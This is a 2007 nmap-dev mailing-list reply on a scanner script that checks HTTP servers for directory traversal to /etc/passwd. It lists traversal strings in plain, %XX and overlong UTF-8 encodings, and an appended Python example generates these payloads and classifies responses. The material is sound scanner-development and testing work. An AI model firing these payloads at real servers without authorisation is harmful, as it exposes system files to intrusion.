Nmap Development mailing list archives
Re: [NSE Script] HTTP probe for /etc/passwd
From: Brandon Enright <bmenrigh () ucsd edu>
Date: Sat, 21 Jul 2007 01:19:48 +0000
On Fri, 20 Jul 2007 20:00:27 -0500 plus or minus some time
MadHat Unspecific <madhat () unspecific com> wrote:

> Kris Katterjohn wrote:
> > Hey everyone! I attached HTTPpasswd.nse, which is a script to probe for
> > /etc/passwd through HTTP servers that are susceptible to directory
> > traversal. It's my first script that actually does something, so any
> > comments are welcome and appreciated.
>
> Checking for a positive return code is not always useful. Custom 404
> messages can produce 200 return codes in some configurations. It would be
> better to check the response for a specific entry like "root:".

The exact same thing occurred to me as well. In addition to checking for a 200, you should check that at least one line matches the general format of /etc/passwd. Something simple like "the first line has more than one ':'" would probably work just fine.

Also, while doing '../' x 10 is probably the canonical directory traversal attack, there are many other useful techniques that yield the same result. Starting on page 264 of the book "Exploiting Software, How to Break Code" (ISBN 0-201-78695-8) several alternate encoding techniques are outlined. You might want to try a few of these (mostly from the book):

.../../../etc/passwd
....????./../../etc/passwd
..\..\..\etc\passwd    # works on many servers
..\/..\/..\/etc\/passwd

Of course, you should encode these in %XX format as well as leaving them as ASCII bytes. Also, you might want to try Unicode. '.' is 0xC0AE, '/' is 0xC0AF, and '\' is 0xC19C.

Obviously it is a trade-off between speed and thorough checking, so what you have done already might be enough.

Thanks for the excellent contribution, I can't wait to test this.

Brandon

_______________________________________________
Sent through the nmap-dev mailing list
http://cgi.insecure.org/mailman/listinfo/nmap-dev
Archived at http://SecLists.Org
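The two suggestions in this message (check the body for /etc/passwd structure rather than trusting a 200, and try alternate separator and encoding variants of the traversal path) in working form, as an added example. This is Python written for this page, not HTTPpasswd.nse or any Nmap code; the response bodies are constructed samples, the `..????.` variant from the message is left out because its characters did not survive the archive, and the overlong two-byte sequences are exactly the ones quoted above (0xC0AE, 0xC0AF, 0xC19C), sent %XX-encoded because the raw bytes cannot go into a request line as-is.

```python
"""Payload generation and response validation for an HTTP /etc/passwd traversal probe
(added Python example for the thread above, not the NSE script being discussed)."""
import re

# Separator variants from the thread as (step, separator used inside "etc/passwd").
# The "....????./" variant is omitted: its characters did not survive the archive.
STEP_VARIANTS = [("../", "/"), (".../", "/"), ("..\\", "\\"), ("..\\/", "\\/")]

# Two-byte sequences quoted in the thread. Each is the overlong UTF-8 form of the
# ASCII character it stands for, which is why lenient decoders map it back to
# '.', '/' or '\' after any path-normalisation check has already run.
OVERLONG = {".": b"\xc0\xae", "/": b"\xc0\xaf", "\\": b"\xc1\x9c"}


def pct_encode(data: bytes) -> str:
    """Encode every byte as %XX (the fully-encoded form suggested in the thread)."""
    return "".join("%%%02X" % b for b in data)


def overlong_encode(path: str) -> str:
    """Replace '.', '/' and '\\' with their overlong sequences, %XX-encoded so the
    request line stays printable; other characters are left as literal ASCII."""
    return "".join(pct_encode(OVERLONG[c]) if c in OVERLONG else c for c in path)


def traversal_payloads(depth: int = 10, target: str = "etc/passwd") -> list:
    """Return the ordered, de-duplicated list of request paths to try: for each
    separator variant the raw ASCII form, the fully %XX-encoded form and the
    overlong form."""
    out = []
    for step, sep in STEP_VARIANTS:
        raw = step * depth + target.replace("/", sep)
        for candidate in (raw, pct_encode(raw.encode("ascii")), overlong_encode(raw)):
            if candidate not in out:
                out.append(candidate)
    return out


# One /etc/passwd line: seven colon-separated fields with numeric uid and gid.
PASSWD_LINE = re.compile(r"^[^:\s]+:[^:]*:\d+:\d+:[^:]*:[^:]*:[^:]*$")


def looks_like_passwd(body: str) -> bool:
    """Content check from the thread: a 200 is not enough, the body must carry a
    'root:' entry and at least one line with the passwd field layout."""
    lines = [ln.rstrip("\r") for ln in body.split("\n") if ln.strip()]
    has_root = any(ln.startswith("root:") for ln in lines)
    has_layout = any(PASSWD_LINE.match(ln) for ln in lines)
    return has_root and has_layout


def classify(status: int, body: str) -> str:
    """Combine the status and content checks into the verdict a probe should report."""
    if status != 200:
        return "not found"
    if looks_like_passwd(body):
        return "vulnerable"
    return "200 without passwd content (custom 404 or unrelated page)"


# Constructed sample responses for offline testing (not captured from a real host).
PASSWD_BODY = (
    "root:x:0:0:root:/root:/bin/bash\n"
    "daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n"
    "www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\n"
)
CUSTOM_404_BODY = (
    "<html><head><title>Oops</title></head>\n"
    "<body><h1>Page not found</h1><p>Try the site root: /index.html</p></body></html>\n"
)

if __name__ == "__main__":
    for p in traversal_payloads(depth=3):
        print(p)
    print(classify(200, PASSWD_BODY))     # vulnerable
    print(classify(200, CUSTOM_404_BODY)) # 200 without passwd content (...)
```

The content check deliberately requires both a `root:` entry and a full seven-field line, so a custom 404 page served with status 200 (the case MadHat raised) is reported as such rather than as a finding; the payload list grows to 12 entries at a single depth, which is the speed-versus-thoroughness trade-off the message ends on.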
Current thread:
- [NSE Script] HTTP probe for /etc/passwd Kris Katterjohn (Jul 20)
- Re: [NSE Script] HTTP probe for /etc/passwd MadHat Unspecific (Jul 20)
- Re: [NSE Script] HTTP probe for /etc/passwd Brandon Enright (Jul 20)
- Re: [NSE Script] HTTP probe for /etc/passwd Kris Katterjohn (Jul 20)
- Re: [NSE Script] HTTP probe for /etc/passwd Kris Katterjohn (Jul 21)
- Re: [NSE Script] HTTP probe for /etc/passwd Brandon Enright (Jul 21)
- Re: [NSE Script] HTTP probe for /etc/passwd Kris Katterjohn (Jul 21)
- Re: [NSE Script] HTTP probe for /etc/passwd Brandon Enright (Jul 20)
- Re: [NSE Script] HTTP probe for /etc/passwd Brandon Enright (Jul 21)
- Re: [NSE Script] HTTP probe for /etc/passwd Kris Katterjohn (Jul 21)
- Re: [NSE Script] HTTP probe for /etc/passwd Fyodor (Jul 21)
- Re: [NSE Script] HTTP probe for /etc/passwd Brandon Enright (Jul 22)
- Re: [NSE Script] HTTP probe for /etc/passwd Fyodor (Jul 22)
- Re: [NSE Script] HTTP probe for /etc/passwd MadHat Unspecific (Jul 20)
- Re: [NSE Script] HTTP probe for /etc/passwd Gaveen Prabhasara (Jul 22)